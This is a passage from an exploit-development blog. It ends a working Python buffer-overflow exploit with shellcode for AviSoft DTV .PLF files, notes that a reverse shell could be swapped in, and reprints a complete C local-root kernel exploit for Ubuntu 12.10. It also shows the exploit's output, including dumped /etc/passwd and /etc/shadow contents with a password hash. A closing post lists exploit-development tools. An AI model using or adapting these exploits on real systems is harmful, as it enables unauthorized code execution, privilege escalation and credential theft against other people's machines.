"x12xeax63x5dx5cx12x0fx39x7dx23xdcx59x41x6ax69"
"xa9x31x6dxbbxe3xbax5cx83xa8x84x51x0exb0xc1x55"
"xf1xc7x39xa6x8cxdfxf9xd5x4ax55x1cx7dx18xcdxc4"
"x7cxcdx88x8fx72xbaxdfxc8x96x3dx33x63xa2xb6xb2"
"xa4x23x8cx90x60x68x56xb8x31xd4x39xc5x22xb0xe6"
"x63x28x52xf2x12x73x38x05x96x09x05x05xa8x11x25"
"x6ex99x9axaaxe9x26x49x8fx06x6dxd0xb9x8ex28x80"
"xf8xd2xcax7ex3exebx48x8bxbex08x50xfexbbx55xd6"
"x12xb1xc6xb3x14x66xe6x91x76xe9x74x79x79";

Well, Let’s modify the script again,change the shellcode. The Final reliable working exploit is:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="x90"*260 #Found by mona.py
eip ="xabxa7x11x64" #EIP
junk="x90"*500 #500 nops before real shellcode

#msfpayload windows/exec cmd=calc R |msfencode -b "x00xffx0ax0dx1axff" -t c
shellcode=("xdaxdbxd9x74x24xf4x5bx31xc9xb1x32xb8x6exb9xe3"
"x05x31x43x17x83xc3x04x03x2dxaax01xf0x4dx24x4c"
"xfbxadxb5x2fx75x48x84x7dxe1x19xb5xb1x61x4fx36"
"x39x27x7bxcdx4fxe0x8cx66xe5xd6xa3x77xcbxd6x6f"
"xbbx4dxabx6dxe8xadx92xbexfdxacxd3xa2x0exfcx8c"
"xa9xbdx11xb8xefx7dx13x6ex64x3dx6bx0bxbaxcaxc1"
"x12xeax63x5dx5cx12x0fx39x7dx23xdcx59x41x6ax69"
"xa9x31x6dxbbxe3xbax5cx83xa8x84x51x0exb0xc1x55"
"xf1xc7x39xa6x8cxdfxf9xd5x4ax55x1cx7dx18xcdxc4"
"x7cxcdx88x8fx72xbaxdfxc8x96x3dx33x63xa2xb6xb2"
"xa4x23x8cx90x60x68x56xb8x31xd4x39xc5x22xb0xe6"
"x63x28x52xf2x12x73x38x05x96x09x05x05xa8x11x25"
"x6ex99x9axaaxe9x26x49x8fx06x6dxd0xb9x8ex28x80"
"xf8xd2xcax7ex3exebx48x8bxbex08x50xfexbbx55xd6"
"x12xb1xc6xb3x14x66xe6x91x76xe9x74x79x79")
shellcode+="x90"*900 #Okay, Need enough junk , so nops instead "A"

all=push+eip+junk+shellcode

try:
f.write(all)
f.close()
print "File created"
except:
print "File cannot be created"

After regenerating the “crash-me.PLF” open in AviSoft DTV and it will execute calc.exe. I did it in debugger with pressing F9:

Anytime We can change the windows/exec shellcode to reverse shellcode which will connect to my specified IP address with command shell. 

The same exploit will work on windows 7 too :

Because i used EIP address from the application itself. If i would use the EIP from OS dll then of course the exploit won’t work(The advantage of application’s dll).

This is it!

Note: Exploit writing is much more about research. Without researching it is not possible to be an exploit writer . If you have questions,advices, please comment here or mail me and i will try to answer(Love to discuss!).
If you want to learn more about exploit development(In details) , read corelan’s tutorial https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/.Much better than other commercial training :).

Ubuntu 12.10 Local Root Exploit

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Everybody know Ubuntu is a popular Linux distro(Basically for newbie). Today i was visiting exploitdb and found the Ubuntu 12.10 Local root exploit which worked only on 64bit.

I have tested the code since i had Ubuntu 12.10 installed on my vm already.

Code:

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3)))
x()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}

char stage1[] = "xffx25x00x00x00x00x00x00x00x00x00x00x00";

int main() {
int fd;
unsigned long mmap_start, mmap_size = 0x10000;
unsigned family;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
char buf[8192];

if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
printf("Can't create sock diag socketn");
return -1;
}

memset(&req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_seq = 123456;

req.r.udiag_states = -1;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

/* Ubuntu 12.10 x86_64 */
req.r.sdiag_family = 0x37;
commit_creds = (_commit_creds) 0xffffffff8107d180;
prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
mmap_start = 0x1a000;

if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {

printf("mmap faultn");
exit(1);
}

*(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
memset((void *)mmap_start, 0x90, mmap_size);
memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

send(fd, &req, sizeof(req), 0);
if(!getuid())
system("/bin/sh");
}

test@weird:~/Documents$ gcc -o ubu *
test@weird:~/Documents$ ls
test.c ubu
test@weird:~/Documents$ ./ubu
# whoami
root

# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
avahi-autoipd:x:103:106:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
whoopsie:x:105:110::/nonexistent:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:110:118:Light Display Manager:/var/lib/lightdm:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
hplip:x:112:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:113:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
saned:x:114:123::/home/saned:/bin/false
kdm:x:115:65534::/home/kdm:/bin/false
test:x:1000:1000:test,,,:/home/test:/bin/bash
 # cat /etc/shadow
 root:!:15651:0:99999:7:::
daemon:*:15630:0:99999:7:::
bin:*:15630:0:99999:7:::
sys:*:15630:0:99999:7:::
sync:*:15630:0:99999:7:::
games:*:15630:0:99999:7:::
man:*:15630:0:99999:7:::
lp:*:15630:0:99999:7:::
mail:*:15630:0:99999:7:::
news:*:15630:0:99999:7:::
uucp:*:15630:0:99999:7:::
proxy:*:15630:0:99999:7:::
www-data:*:15630:0:99999:7:::
backup:*:15630:0:99999:7:::
list:*:15630:0:99999:7:::
irc:*:15630:0:99999:7:::
gnats:*:15630:0:99999:7:::
nobody:*:15630:0:99999:7:::
libuuid:!:15630:0:99999:7:::
syslog:*:15630:0:99999:7:::
messagebus:*:15630:0:99999:7:::
avahi-autoipd:*:15630:0:99999:7:::
usbmux:*:15630:0:99999:7:::
whoopsie:*:15630:0:99999:7:::
kernoops:*:15630:0:99999:7:::
rtkit:*:15630:0:99999:7:::
colord:*:15630:0:99999:7:::
lightdm:*:15630:0:99999:7:::
avahi:*:15630:0:99999:7:::
hplip:*:15630:0:99999:7:::
pulse:*:15630:0:99999:7:::
saned:*:15630:0:99999:7:::
kdm:*:15650:0:99999:7:::
test:$6$aoMcNoTU$IR6Ug3SthKdI4.ixdwf9rsIRsdz.4OACiabhaoxdd0NoYbjvxa9I.dj7VF7U4OaB7Oy2gDezCXL/oQx9riRXP0:15651:0:99999:7:::


This is really great !

Source: http://www.exploit-db.com/exploits/24746/

Tools for Exploit development

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

                                          Tools for Exploit development
                           =================X===============

There is no need much tools for developing exploit. If we want to develop buffer overflow exploit such as stack & heap overflow, format string, or any other software exploit
then few tools i have ever used most of time are: 

*** immunity debugger: immunitysec.com

 
Mona.py: corelan.be

*** PEDUMP:


*** Ollydbg: www.ollydbg.de

Metasploit: metasploit.com

Python: python.org

*** Virtual box or Vmware workstation: https://www.virtualbox.org/, http://vmware.com